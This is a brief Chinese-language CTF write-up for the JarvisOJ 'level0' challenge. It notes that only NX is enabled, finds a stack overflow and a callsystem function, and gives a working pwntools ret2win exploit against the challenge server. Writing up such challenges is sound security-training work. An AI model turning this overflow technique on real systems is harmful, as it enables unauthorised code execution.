checksec 一波,只开了NX
image.png
再IDA看一下程序 ,栈溢出,再找一找有没有可用的函数
image.png
发现了这个
image.png
exp:
#-*- coding:utf-8 -*-
from pwn import *
# p = process('./level0')
p = remote("pwn2.jarvisoj.com","9881")
callsystem = 0x400596
payload = 0x80*"A" + p64(0) + p64(callsystem)
p.sendline(payload)
p.interactive()















网友评论